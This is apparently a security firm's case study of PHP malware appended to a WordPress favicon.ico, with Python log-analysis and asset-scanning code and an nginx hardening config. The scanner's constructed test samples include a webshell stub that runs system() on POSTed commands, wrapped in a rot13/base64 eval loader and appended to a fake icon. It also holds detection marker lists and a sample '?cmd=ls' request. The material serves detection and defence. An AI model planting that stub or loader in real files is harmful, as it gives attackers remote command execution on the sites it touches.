// Case studies

Malware hidden inside a WordPress favicon.ico

Outbound traffic spikes were traced to PHP embedded in a .ico file; a full filesystem IOC sweep, credential rotation, and WAF rules restored a clean bill of health in 72 hours.

By Simplileap · Published July 22, 2025 · 9 min read

A mid-size professional services firm in Bangalore noticed intermittent outbound DNS requests to unknown domains and a sudden crawl-rate drop. Their hosting provider flagged elevated PHP-FPM workers overnight. Wordfence reported "clean" on a surface scan; Sucuri's remote check flagged anomalous response headers on the favicon request.

Simplileap's first hypothesis was a compromised plugin or a wp-config injection, both common patterns. A grep across wp-content for eval, base64_decode, and gzinflate returned nothing obvious; note that a search scoped to wp-content would not have covered a file served from /favicon.ico in the document root in any case. Access logs showed repeated GET /favicon.ico from the same three IP ranges, each response larger than the stock asset.
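The access-log signal described above, reduced to a script. This is an added example, not tooling from the engagement: it parses combined-format log lines, keeps only 200 responses for /favicon.ico, and groups hits by source /24 to surface two things a browser never produces, a favicon response larger than the stock asset and a non-GET request for it. The expected size (1234 bytes), the slack value, and the log lines are all constructed stand-ins.

```python
import re
import ipaddress
from collections import Counter, defaultdict

# Combined log format as written by Apache and nginx by default (assumed; adjust for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Size of the known-good favicon.ico. The page gives roughly 1.2KB; 1234 bytes is a constructed stand-in.
EXPECTED_FAVICON_BYTES = 1234
# A little slack so a server that counts a trailing byte or two does not raise false alarms.
SLACK = 64


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def favicon_anomalies(lines, expected=EXPECTED_FAVICON_BYTES, slack=SLACK):
    """Group favicon.ico requests by source /24 (IPv4 assumed) and report two signals:
    responses larger than the stock asset, and non-GET requests (a browser never
    POSTs to a favicon; a command handler living in one would be driven that way)."""
    oversized = Counter()
    sizes = defaultdict(set)
    non_get = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 200:
            continue
        if rec["path"].split("?", 1)[0] != "/favicon.ico":
            continue
        net = str(ipaddress.ip_network(rec["ip"] + "/24", strict=False))
        if rec["method"] != "GET":
            non_get[net] += 1
        if rec["bytes"] > expected + slack:
            oversized[net] += 1
            sizes[net].add(rec["bytes"])
    return {
        "oversized": dict(oversized),
        "sizes": {net: sorted(s) for net, s in sizes.items()},
        "non_get": dict(non_get),
    }


# Constructed sample lines (documentation IP ranges, not addresses from the case).
SAMPLE_LOG = """\
203.0.113.10 - - [18/Jul/2025:22:14:03 +0530] "GET /favicon.ico HTTP/1.1" 200 14336 "-" "Mozilla/5.0"
203.0.113.11 - - [18/Jul/2025:22:14:09 +0530] "GET /favicon.ico HTTP/1.1" 200 14336 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Jul/2025:22:15:41 +0530] "GET /favicon.ico HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.200 - - [18/Jul/2025:22:16:02 +0530] "GET /favicon.ico?cmd=ls HTTP/1.1" 200 14400 "-" "curl/8.0"
203.0.113.12 - - [18/Jul/2025:22:17:55 +0530] "POST /favicon.ico HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.7 - - [18/Jul/2025:22:18:10 +0530] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    report = favicon_anomalies(SAMPLE_LOG.splitlines())
    for net, count in sorted(report["oversized"].items(), key=lambda kv: -kv[1]):
        print(f"{net}: {count} oversized favicon responses, sizes {report['sizes'][net]}")
    for net, count in report["non_get"].items():
        print(f"{net}: {count} non-GET favicon requests")
```

Run it against a real log with `favicon_anomalies(open("access.log").read().splitlines())`; the /24 grouping is what makes "the same three IP ranges" visible when individual addresses rotate.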

On disk, favicon.ico was 14KB instead of the expected 1.2KB. Hex inspection revealed appended PHP after the ICO magic bytes, obfuscated with rot13 and chunked base64 that decoded to a mailer stub and a remote command handler. Appended code in a static asset does nothing by itself; it executes only when something includes or evaluates the file, or when the web server hands the file to the PHP interpreter. The file timestamp matched a Friday evening when a contractor's FTP credentials were used from a residential ISP in another state.

Problems during remediation: restoring from a "clean" backup taken 10 days earlier reintroduced the payload, because that backup had been captured after the compromise but before detection and already contained it; two mu-plugins with legitimate-sounding names (wp-cache-helper.php) had been added that re-dropped the payload whenever favicon.ico was deleted, unless write permissions on the uploads tree had first been locked down with chmod.

Response playbook: isolate the origin behind maintenance mode with allow-listed office IPs; rotate all SFTP, wp-admin, and database credentials; export an IOC list (file hashes, mu-plugin paths, rogue cron events); surgically delete favicon.ico and replace it from a known-good source; run a full wp-content scan with maldet plus custom YARA rules for PHP-in-binary patterns.
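A scanner for the PHP-in-binary pattern found in the favicon and named again in the playbook's YARA step. This is an added example, not the engagement's YARA rules or tooling. It does three checks an image should never fail: it parses the ICO directory to compute the size the file claims for itself and reports any trailer beyond it, it searches for PHP markers in the raw bytes, and it repeats the search after a rot13 pass so that a wholly rot13-encoded blob (where `<?php` appears as `<?cuc`) is caught as well. The sample ICOs, the stub and the loader text are constructed, the magic-byte table and marker list are assumptions to extend.

```python
import base64
import codecs
import os
import re
import struct

# Magic bytes of the static asset types checked (assumed list; extend for svg, webp, etc.).
MAGIC = {
    b"\x00\x00\x01\x00": "ico",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Strings with no business inside an image. Checked raw and again after rot13.
PHP_MARKERS = (b"<?php", b"<?=", b"eval(", b"base64_decode(", b"str_rot13(",
               b"gzinflate(", b"gzuncompress(", b"assert(", b"create_function(")

# Long base64 runs are informational only: JPEG/XMP metadata can legitimately contain them.
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def detect_type(data):
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def ico_declared_size(data):
    """End of the furthest image blob listed in the ICO directory. Bytes after
    that point are a trailer that no icon decoder will ever read."""
    if len(data) < 6:
        return None
    reserved, kind, count = struct.unpack_from("<HHH", data, 0)
    if reserved != 0 or kind not in (1, 2) or count == 0:
        return None
    end = 6 + 16 * count
    for i in range(count):
        entry = 6 + 16 * i
        if entry + 16 > len(data):
            return None
        size, offset = struct.unpack_from("<II", data, entry + 8)   # dwBytesInRes, dwImageOffset
        end = max(end, offset + size)
    return end


def rot13(data):
    # latin-1 maps bytes 1:1 to code points, so non-ASCII bytes survive the round trip.
    return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")


def scan_asset(data):
    kind = detect_type(data)
    trailer = 0
    if kind == "ico":
        declared = ico_declared_size(data)
        if declared is not None and len(data) > declared:
            trailer = len(data) - declared
    markers = [m.decode() for m in PHP_MARKERS if m in data]
    rot_markers = [m.decode() for m in PHP_MARKERS if m in rot13(data)]
    return {
        "type": kind, "size": len(data), "trailer": trailer,
        "markers": markers, "rot13_markers": rot_markers,
        "base64_runs": len(BASE64_RUN.findall(data)),
        "suspicious": bool(trailer or markers or rot_markers),
    }


def scan_tree(root, exts=(".ico", ".png", ".jpg", ".jpeg", ".gif")):
    """Walk a docroot and yield (path, findings) for every flagged asset."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    findings = scan_asset(fh.read())
                if findings["suspicious"]:
                    yield path, findings


# --- constructed samples, not artefacts from the engagement ---------------
def build_ico(image_bytes):
    header = struct.pack("<HHH", 0, 1, 1)                      # one entry
    entry = struct.pack("<BBBBHHII", 16, 16, 0, 0, 1, 32, len(image_bytes), 22)
    return header + entry + image_bytes

CLEAN_ICO = build_ico(b"\x00" * 40)   # zeros stand in for real pixel data
STUB = b"mail($_POST['to'],'hi',$_POST['body']); if(isset($_POST['c'])){system($_POST['c']);}"
B64 = base64.b64encode(STUB)
HALF = len(B64) // 2
# Loader in the style the page describes: decoder name hidden with rot13, body as chunked base64.
PAYLOAD = (b"\n<?php $f=str_rot13('onfr64_qrpbqr');eval($f(implode('',array('"
           + B64[:HALF] + b"','" + B64[HALF:] + b"')))); ?>")
INFECTED_ICO = CLEAN_ICO + PAYLOAD
# Variant with the whole appended blob rot13-encoded, as a separate loader would decode it.
ROT13_ICO = CLEAN_ICO + rot13(b"\n<?php eval(base64_decode('" + B64 + b"')); ?>")

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_ICO), ("appended", INFECTED_ICO), ("rot13", ROT13_ICO)):
        print(label, scan_asset(blob))
```

`scan_tree("/var/www/html")` gives the sweep; the trailer check is the one that does not depend on any marker list, which is why it belongs next to the signature rules rather than instead of them.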

Hardening delivered: disable file editing in wp-config; move wp-admin behind IP allow list + 2FA; immutable S3 backups with cross-region replication; WAF rule blocking PHP execution in uploads and static asset directories; monthly malware scan cadence added to AMC retainer.
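What the "block PHP execution in uploads and static asset directories" rule looks like at the web-server layer, as an added example and not the client's WAF configuration. It assumes an nginx vhost in front of PHP-FPM (socket path is a placeholder). The first location refuses to pass anything under uploads to PHP regardless of extension games; the `try_files` line in the handler makes sure only scripts that really exist are executed, so a request like /favicon.ico/x.php cannot be steered onto the icon via cgi.fix_pathinfo. On the WordPress side, the file-editing item is the single line `define('DISALLOW_FILE_EDIT', true);` in wp-config.php.

```nginx
# Inside the server { } block of the WordPress vhost, ahead of the generic PHP handler.

# 1. Nothing under uploads is ever handed to PHP-FPM, whatever its extension claims.
location ~* ^/wp-content/uploads/.*\.(php|phtml|phar|php[0-9])$ {
    deny all;
}

# 2. The PHP handler only runs scripts that exist on disk; "=404" stops
#    /favicon.ico/x.php from resolving to favicon.ico through PATH_INFO handling.
location ~ \.php$ {
    try_files $uri =404;
    fastcgi_pass unix:/run/php/php-fpm.sock;   # socket path is an assumption
    fastcgi_index index.php;
    include fastcgi_params;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
}
```

Order matters: nginx takes the first matching regex location, so the uploads deny must appear before the `\.php$` handler. Neither rule stops a loader that `include`s the icon from inside PHP, which is why the mu-plugin sweep and the uploads permission lockdown sit alongside it in the playbook.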

Outcome: outbound anomaly ceased within 72 hours; Google Safe Browsing clearance within five days; no evidence of customer data exfiltration in retained logs. The client moved to our Commerce-tier AMC with staging-before-prod plugin policy. Identity withheld under security engagement terms.
